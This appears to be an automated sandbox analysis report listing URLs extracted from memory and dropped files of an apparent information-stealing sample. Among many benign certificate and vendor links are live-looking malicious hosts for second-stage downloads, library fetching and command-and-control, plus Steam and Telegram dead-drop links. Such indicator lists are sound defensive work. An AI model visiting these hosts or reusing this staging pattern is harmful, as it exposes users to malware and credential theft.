Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://ocsp.entrust.net02
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://ocsp.entrust.net03
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001549000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exe1kkkktoken
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://playd.healthnlife.pk/ldms/a43486128347.exeorm-data;
Source: file.exe, file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.0000000001549000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//freebl3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//freebl3.dllnLF
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//mozglue.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//msvcp140.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//msvcp140.dll6L
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//nss3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.0000000001565000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//nss3.dllp
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//softokn3.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.000000000157A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//softokn3.dllNMf
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000048F000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//sql.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//vcruntime140.dll
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com//vcruntime140.dll0
Source: file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/gfdsgrewgdsfadsahttps://steamcommunity.com/profiles/76561199780418869u55
Source: MSBuild.exe, 00000001.00000002.2478563220.00000000004D2000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://proxy.johnmccrea.com/ontent-Disposition:
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: http://www.entrust.net/rpa03
Source: MSBuild.exe, MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490090182.000000001DDCD000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: KJKJKF.1.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site/;
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site/api
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site/api;
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site/i
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://beearvagueo.site:443/apil
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: KJKJKF.1.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: KJKJKF.1.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: KJKJKF.1.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: KJKJKF.1.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: KJKJKF.1.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: KJKJKF.1.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: GCGHCB.1.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/nN
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B82000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f
Source: MSBuild.exe, 00000009.00000002.2173304288.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.2171821999.0000000000B5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: IJKJDA.1.dr String found in binary or memory: https://support.mozilla.org
Source: IJKJDA.1.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: IJKJDA.1.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp, CAAKKF.1.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: CAAKKF.1.dr String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ost.exe
Source: MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp, CAAKKF.1.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: CAAKKF.1.dr String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: MSBuild.exe, 00000001.00000002.2478563220.000000000056B000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe
Source: file.exe, file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5ed
Source: file.exe, 00000000.00000002.1802985654.00000000005D8000.00000004.00000001.01000000.00000003.sdmp, MSBuild.exe, 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/ae5edu55uhttps://steamcommunity.com/profiles/76561199780418869sql.dllsqlp.dllMozilla/5.
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: KJKJKF.1.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, GCGHCBKFCF.exe.1.dr, a43486128347[1].exe.1.dr String found in binary or memory: https://www.entrust.net/rpa0
Source: MSBuild.exe, 00000001.00000002.2481607551.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2481607551.00000000016AB000.00000004.00000020.00020000.00000000.sdmp, GCGHCB.1.dr String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: KJKJKF.1.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: MSBuild.exe, 00000009.00000002.2171821999.0000000000B9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: MSBuild.exe, 00000001.00000002.2485877933.0000000017A9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: IJKJDA.1.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
